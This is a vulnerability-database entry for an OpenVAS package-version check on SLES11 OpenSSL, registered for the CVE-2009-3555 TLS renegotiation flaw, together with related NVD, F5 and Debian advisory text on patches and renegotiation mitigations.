ID OPENVAS:66285 Type openvas Reporter Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com Modified 2017-07-11T00:00:00
Description
The remote host is missing updates to packages that affect
the security of your system (this check is registered for CVE-2009-3555,
the SSL/TLS renegotiation flaw). One or more of the following packages
are affected:
libopenssl0_9_8
openssl
openssl-doc
More details may also be found by searching the SuSE
Enterprise Server 11 patch database located at
http://download.novell.com/patch/finder/
#
#VID d0129289ed5f99e99f64649fe9227069
# OpenVAS Vulnerability Test
# $
# Description: Security update for libopenssl
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
# Summary text shown with a finding; it is attached to the script through
# script_tag(name:"summary") in the description block.
# NOTE(review): the wording is generic and lists only package names. The issue
# this check is registered for is CVE-2009-3555 (see script_cve_id), so a
# reader triaging a finding should start from that identifier, not this text.
tag_summary = "The remote host is missing updates to packages that affect
the security of your system. One or more of the following packages
are affected:
libopenssl0_9_8
openssl
openssl-doc
More details may also be found by searching for the SuSE
Enterprise Server 11 patch database located at
http://download.novell.com/patch/finder/";
# Remediation text, attached through script_tag(name:"solution"). It names no
# package version; the versions this script compares against are the rpm:
# arguments passed to isrpmvuln() further down.
tag_solution = "Please install the updates provided by SuSE.";
# Metadata registration. When `description` is set, the script only registers
# its identity, references and prerequisites, then leaves through exit(0), so
# the package comparison further down is not reached on this path.
if (description)
{
  # Identity and references.
  script_xref(name:"URL", value:"https://bugzilla.novell.com/show_bug.cgi?id=553641");
  script_id(66285);
  script_version("$Revision: 6666 $");
  script_tag(name:"last_modification", value:"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $");
  script_tag(name:"creation_date", value:"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)");

  # Severity: CVSS v2 base 5.8. The vector is network-reachable, medium access
  # complexity, no authentication, with partial integrity and availability
  # impact and no confidentiality impact.
  script_cve_id("CVE-2009-3555");
  script_tag(name:"cvss_base", value:"5.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:P");

  script_name("SLES11: Security update for libopenssl");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
  script_family("SuSE Local Security Checks");

  # Prerequisites: the check depends on gather-package-list.nasl and on the
  # two ssh/login/* keys listed here.
  # NOTE(review): presumably those keys exist only after an authenticated SSH
  # login collected the RPM list, so an unauthenticated scan would produce no
  # verdict from this script at all -- confirm against gather-package-list.nasl.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/suse_sles", "ssh/login/rpms");

  script_tag(name:"solution", value:tag_solution);
  script_tag(name:"summary", value:tag_summary);

  # qod_type "package": the verdict comes from package data, not from probing
  # the TLS service, so it says nothing about how a running daemon actually
  # handles renegotiation (e.g. a process still using the old library).
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");
  exit(0);
}
#
# The script code starts here
#
include("pkg-lib-rpm.inc");
# Check each of the three packages named in the advisory against the build
# string 0.9.8h-30.15.1 for release SLES11.0, and collect every non-NULL
# result so that one finding lists all affected packages.
# NOTE(review): isrpmvuln() comes from pkg-lib-rpm.inc (not shown here);
# presumably it returns report text when the installed RPM is older than the
# rpm: argument, and NULL otherwise -- confirm against the include.
res = "";
report = "";

res = isrpmvuln(pkg:"libopenssl0_9_8", rpm:"libopenssl0_9_8~0.9.8h~30.15.1", rls:"SLES11.0");
if (res != NULL) {
  report += res;
}

res = isrpmvuln(pkg:"openssl", rpm:"openssl~0.9.8h~30.15.1", rls:"SLES11.0");
if (res != NULL) {
  report += res;
}

res = isrpmvuln(pkg:"openssl-doc", rpm:"openssl-doc~0.9.8h~30.15.1", rls:"SLES11.0");
if (res != NULL) {
  report += res;
}

# Three outcomes:
#   - something was collected     -> raise the finding;
#   - nothing collected, but __pkg_match is set -> exit(99), "not vulnerable";
#   - nothing collected and __pkg_match is unset -> fall off the end with no
#     verdict. Treat that last case as "unknown", not as "patched".
# NOTE(review): __pkg_match is not assigned in this file; it looks like a flag
# maintained by pkg-lib-rpm.inc when a listed package was found -- confirm.
if (report == "") {
  if (__pkg_match) {
    exit(99); # Not vulnerable.
  }
} else {
  security_message(data:report);
}
{"id": "OPENVAS:66285", "type": "openvas", "bulletinFamily": "scanner", "title": "SLES11: Security update for libopenssl", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libopenssl0_9_8\n openssl\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "published": "2009-11-17T00:00:00", "modified": "2017-07-11T00:00:00", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=66285", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=553641"], "cvelist": ["CVE-2009-3555"], "lastseen": "2017-07-26T08:55:41", "viewCount": 6, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2017-07-26T08:55:41", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3555"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2009-3555"]}, {"type": "f5", "idList": ["F5:K10737", "SOL10737"]}, {"type": "openvas", "idList": ["OPENVAS:880612", "OPENVAS:136141256231066497", "OPENVAS:136141256231066279", "OPENVAS:840453", "OPENVAS:136141256231066583", "OPENVAS:800466", "OPENVAS:66278", "OPENVAS:1361412562310840468", "OPENVAS:136141256231066563", "OPENVAS:840504"]}, {"type": "seebug", "idList": ["SSV:12600", "SSV:18637", "SSV:15088"]}, {"type": "nessus", "idList": ["SUSE_11_0_LIBOPENSSL-DEVEL-091112.NASL", "SL_20100325_NSS_ON_SL4_X.NASL", "SUSE_11_GNUTLS-101206.NASL", "SUSE_OPENSSL-6655.NASL", "SLACKWARE_SSA_2009-320-01.NASL", "SUSE_11_3_GNUTLS-101025.NASL", "SUSE_11_0_COMPAT-OPENSSL097G-091113.NASL", "SUSE_11_1_LIBOPENSSL-DEVEL-091112.NASL", "UBUNTU_USN-927-6.NASL", "FEDORA_2010-3905.NASL"]}, {"type": "redhat", "idList": ["RHSA-2010:0165"]}, {"type": 
"securityvulns", "idList": ["SECURITYVULNS:DOC:23561", "SECURITYVULNS:DOC:22982", "SECURITYVULNS:VULN:10388", "SECURITYVULNS:DOC:23890", "SECURITYVULNS:DOC:22763", "SECURITYVULNS:DOC:22777"]}, {"type": "slackware", "idList": ["SSA-2009-320-01"]}, {"type": "ubuntu", "idList": ["USN-927-5", "USN-927-6", "USN-927-1"]}, {"type": "cisco", "idList": ["CISCO-SA-20091109-TLS"]}, {"type": "fedora", "idList": ["FEDORA:611D110F917", "FEDORA:4C4E710F878"]}, {"type": "oraclelinux", "idList": ["ELSA-2010-0165"]}, {"type": "exploitdb", "idList": ["EDB-ID:10071"]}, {"type": "hackerone", "idList": ["H1:5617"]}, {"type": "centos", "idList": ["CESA-2010:0165"]}], "modified": "2017-07-26T08:55:41", "rev": 2}, "vulnersScore": 5.4}, "pluginID": "66285", "sourceData": "#\n#VID d0129289ed5f99e99f64649fe9227069\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for libopenssl\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n libopenssl0_9_8\n openssl\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=553641\");\n script_id(66285);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"SLES11: Security update for libopenssl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "SuSE Local Security Checks"}
{"cve": [{"lastseen": "2021-02-06T13:30:38", "description": "The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a \"plaintext injection\" attack, aka the \"Project Mogul\" issue.", "edition": 10, "cvss3": {}, "published": "2009-11-09T17:30:00", "title": "CVE-2009-3555", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3555"], "modified": "2021-02-05T15:37:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/a:openssl:openssl:1.0", "cpe:/o:debian:debian_linux:4.0", "cpe:/a:openssl:openssl:0.9.8k", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:gnu:gnutls:2.8.5", "cpe:/o:canonical:ubuntu_linux:8.04", "cpe:/o:fedoraproject:fedora:13", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:fedoraproject:fedora:14", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/a:mozilla:nss:3.12.4", "cpe:/o:canonical:ubuntu_linux:9.10", "cpe:/o:fedoraproject:fedora:12", 
"cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/a:apache:http_server:2.2.14", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04", "cpe:/o:fedoraproject:fedora:11"], "id": "CVE-2009-3555", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3555", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:9.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:9.04:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:nss:3.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:11:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:8.10:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:13:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0:*:openvms:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "openssl": [{"lastseen": "2020-09-14T11:36:47", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": " Implement RFC5746 to address vulnerabilities in SSL/TLS renegotiation.\n\n * Fixed in OpenSSL 0.9.8m (Affected 0.9.8-0.9.8l)\n", "edition": 1, "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00", "id": "OPENSSL:CVE-2009-3555", "href": "https://www.openssl.org/news/secadv/20091111.txt", "title": "Vulnerability in OpenSSL CVE-2009-3555", "type": "openssl", "cvss": {"score": 5.8, "vector": 
"AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "f5": [{"lastseen": "2020-04-06T22:39:36", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "", "edition": 1, "modified": "2019-06-13T19:54:00", "published": "2013-07-06T01:56:00", "id": "F5:K10737", "href": "https://support.f5.com/csp/article/K10737", "title": "SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2016-05-30T21:02:08", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "edition": 1, "description": "A Man in the Middle attack allows an attacker to inject an arbitrary amount of chosen plain text into the application protocol stream data during a secure session renegotiation that uses SSL version 3.x or TLS version 1.x. This may provide an attacker the ability to perform arbitrary actions on affected websites with user's credentials. This vulnerability does not allow one to decrypt the intercepted network communication.\n\nInformation about this advisory is available at the following locations:\n\n**Note**: These links take you to a resource outside of AskF5, and it is possible that the documents may be removed without our knowledge.\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555>\n\n**Note**: F5 thanks Marsh Ray, who originally identified and reported this vulnerability.\n\nThe IETF has adopted as [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>) a new extension to the TLS standard that addresses this issue. 
F5 Product Development has implemented this new extension beginning in BIG-IP versions 10.2.3 and 11.0.0.\n\n**Important**: When session renegotiation is disabled, some browsers may log an informational message that appears similar to the following example to the console, when connecting to F5 products:\n\nServer does not support RFC 5746, see CVE-2009-3555\n\nAlthough the message implies that the F5 product to which the browser is connecting is vulnerable to this attack, all vulnerable F5 Products have been patched to disable SSL/TLS renegotiation, and some have been further enhanced to allow explicit control over renegotiation, thus mitigating this attack. For more information regarding completed and planned updates related to this vulnerability, refer to the following table. Note that ID 223836 specifically addresses this error message.\n\nF5 Product Development is tracking this issue as follows:\n\nCR / ID | Description | Affected products | Included in \n---|---|---|--- \nCR132165 / \n \nID 213305 | Introduce the **<disable|enable>** parameter to the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command to control on a per-connection basis how TMM should respond to SSL 3.0/TLS 1.0 renegotiation requests. \n\n\n**Important**: Client-side session renegotiation is still enabled, by default, in versions prior to 10.1.0. In these versions, you must apply an iRule using the **SSL::renegotiate disable **command to each virtual server configuration you wish to protect from this vulnerability. 
Refer to the mitigation section, following, for more information.\n\n**Note**: For more information, refer to the DevCentral wiki page for the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command.\n\n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEngineering Hotfix available for: \nEnterprise Manager 1.8 \nCR132166 / \n \nID 213306 | Patch OpenSSL to disable midstream session renegotiation. This patch protects the Configuration utility and iControl against this vulnerability. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132167 / \n \nID 213307 | Enable midstream session renegotiation for the **big3d **and **gtmd**. This CR is a companion to CR132166, re-enabling mid-stream session renegotiation for the **big3d **and **gtmd** processes, which maintain long-lived iQuery-over-SSL connections that are renegotiated daily. These connections are mutually authenticated using 2-way SSL authentication prior to exchanging application traffic and, thus, are not vulnerable to the man-in-the-middle attacks described in this Solution. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132170 / \n \nID 213308 | Introduce a Client SSL / ServerSSL profile option to control whether midstream session renegotiation is allowed. In versions 10.1.0 - 10.2.2, the default setting for the Client SSL profile is **disabled**, and the default setting for the Server SSL profile is **enabled**. 
**Note**: BIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM | BIG-IP 10.1.0 and later \n \nCR132172 / \n \nID 223836 | Implement [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>), an extension to the TLS standard for secure midstream session renegotiation. **Note**: For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 10.2.3 \nBIG-IP 11.0.0 and later \n \nCR132177 / \nID 295760\n\nand\n\nCR132177-1 / \nID 294172\n\n| Patch OpenSSL to disable midstream session renegotiation. | FirePass | \n\nFirePass 7.0.0 and later \nFirePass 6.1.0 HF1 * \nFirePass 6.0.3 hotfix-132177-1 \nFirePass 6.0.2 hotfix-132177-1 \nFirePass 5.5.2 hotfix-132177-1 \nFirePass 5.5.1 hotfix-132177-1 \nFirePass 5.5 hotfix-132177-1 \n \nImportant: For version 6.1.0, the \nfix for this ID was not included in \nHF3 or HF4. Install the latest \ncumulative hotfix. \n \nID 37053 | Patch or upgrade Apache Tomcat to disable session renegotiation. 
| ARX | ARX 6.2.0 \n \n \nIf a named hotfix has been issued for your software version, you may download the referenced hotfix or later versions of the hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nIf an engineering hotfix has been issued for your software version, you should contact [F5 Technical Support](<http://www.f5.com/training-support/customer-support/contact/>), and reference this Solution number and the associated CR number to request the hotfix.\n\nFor a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of the F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nFor information about installing version 10.x hotfixes, refer to SOL10025: Managing BIG-IP product hotfixes (10.x).\n\n**Mitigation steps for BIG-IP LTM, ASM, PSM, Link Controller, WebAccelerator, or WOM SSL virtual servers**\n\nYou can use the Client SSL profile Renegotiation setting or an iRule to disable client-side session renegotiation for virtual servers. Refer to the following section that applies to your version:\n\n**Note**: Applications that require session renegotiation are inherently vulnerable to the attack. Only removal of the renegotiation requirement in the application itself will eliminate the vulnerability. If session renegotiation is disabled by any of the vulnerability mitigation steps described later, without modifying the application, client connections will be dropped. For example, IE 5.0 clients accessing applications which use SGC (Server Gated Cryptography) certificates are known to require renegotiation, and their connections would be disrupted by such a configuration.\n\n**Important**: Any mitigation action that re-enables session re-negotiation on patched vulnerable versions may re-expose your F5 system to this vulnerability. 
In some cases, iRule logic can be used to control this behavior. Refer to the following sections for details regarding your product and version.\n\n**BIG-IP versions 10.1.0 and later**\n\nBIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. SSL Renegotiation setting is **Enabled,** by default, in the SSL profiles, however, the system requires secure renegotiation of SSL connections. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension.\n\nIn BIG-IP version 10.1.0, the Renegotiation setting was added to the BIG-IP Client session and Server SSL profiles as a result of ID 213308 (formerly CR132180). In versions 10.1.0 - 10.2.2, the Renegotiation setting is **Disabled **by default in the Client SSL profile. Virtual servers using a Client SSL profile with the Renegotiation setting configured to **Disabled **are protected from this vulnerability.\n\nIf necessary, you can selectively enable renegotiation using the **SSL::renegotiate** iRules command on a virtual server that has renegotiation disabled in its Client SSL profile. For example, an iRule similar to the following enables renegotiation only for clients within a single Class C subnet:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nif { [IP::addr [IP::client_addr] equals 192.168.222.0/24] }{ \nSSL::renegotiate enable \n} \n}\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, and 10.1.0 through 10.2.x**\n\nTo mitigate the vulnerability, a BIG-IP system administrator may apply iRules similar to the following to each SSL virtual server. 
This sample iRule uses the **SSL::renegotiate** command to disable client-side session renegotiation, which prevents the BIG-IP system from processing a secondary session renegotiation request:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nSSL::renegotiate disable \n}\n\nThe **<enable|disable>**parameter was added to the **SSL::renegotiate** command in versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, 10.1.x, and 10.2.0 as a result of ID 213305 (formerly CR132165). In versions prior to 10.1.0, all virtual servers with a Client SSL profile applied will, by default, still accept session renegotiation.\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.4.x, 9.3.x prior to 9.3.1 HF8, and 10.0.x prior to 10.0.1 HF3**\n\nTo mitigate the vulnerability in versions that do not include the **SSL::renegotiate** command, apply an iRule similar to the following to each SSL virtual server. The iRule resets the connection if client-side SSL renegotiation is attempted.\n\nwhen CLIENT_ACCEPTED { \n# initialize TLS/SSL handshake count for this connection \nset sslhandshakecount 0 \n} \nwhen CLIENTSSL_HANDSHAKE priority 1 { \n# a handshake just occurred \nincr sslhandshakecount \n# is this the first handshake in this connection? \nif { $sslhandshakecount > 1 } { \n# log (rate limited) the event (to /var/log/ltm) \nlog \"\\\\[VS [IP::local_addr]:[TCP::local_port] client [IP::remote_addr]:[TCP::remote_port]\\\\]:TLS/SSL renegotiation\" \n# if not, close the clientside connection \nreject \n} \n} \n\n\n**Note**: This example was provided by F5 DevCentral poster Lupo. 
The original post is available at the following location:\n\n[mitigating the TLS client-initiated renegotiation MITM attack](<http://devcentral.f5.com/Default.aspx?tabid=53&forumid=5&postid=86456&view=topic>)\n\nA separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n", "modified": "2013-07-05T00:00:00", "published": "2009-11-05T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/10000/700/sol10737.html", "id": "SOL10737", "title": "SOL10737 - SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:15:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2141-3 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJanuary 06, 2011 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : apache2\nVulnerability : backward compatibility option for SSL/TLS insecure\n renegotiation\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2009-3555\nDebian Bug : 587037\n\nDSA-2141-1 changed the behaviour of the openssl libraries in a server\nenvironment to only allow SSL/TLS renegotiation for clients that\nsupport the RFC5746 renegotiation extension. This update to apache2\nadds the new SSLInsecureRenegotiation configuration option that allows\nto restore support for insecure clients. More information can be found\nin the file /usr/share/doc/apache2.2-common/NEWS.Debian.gz .\n\nFor the stable distribution (lenny), the compatibility option has been\nincluded in version 2.2.9-10+lenny9.\n\nIn addition, apache2-mpm-itk has been rebuilt to work with the updated\napache2 packages. 
The new version number is 2.2.6-02-1+lenny4.\n\nFor the unstable distribution (sid), and the testing distribution\n(squeeze), the compatibility option has been included since version\n2.2.15-1.\n\nWe recommend that you upgrade your apache2 and apache2-mpm-itk\npackages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2011-01-05T23:21:10", "published": "2011-01-05T23:21:10", "id": "DEBIAN:DSA-2141-1:7D2D7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00003.html", "title": "[SECURITY] [DSA-2141-1] New apache2 packages add backward compatibility option", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-11-11T13:19:06", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2141-2 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJanuary 06, 2011 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : nss\nVulnerability : SSL/TLS insecure renegotiation protocol design flaw\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2009-3555\n\nCVE-2009-3555:\n\nMarsh Ray, Steve Dispensa, and Martin Rex discovered a flaw in the TLS\nand SSLv3 protocols. If an attacker could perform a man in the middle\nattack at the start of a TLS connection, the attacker could inject\narbitrary content at the beginning of the user's session. 
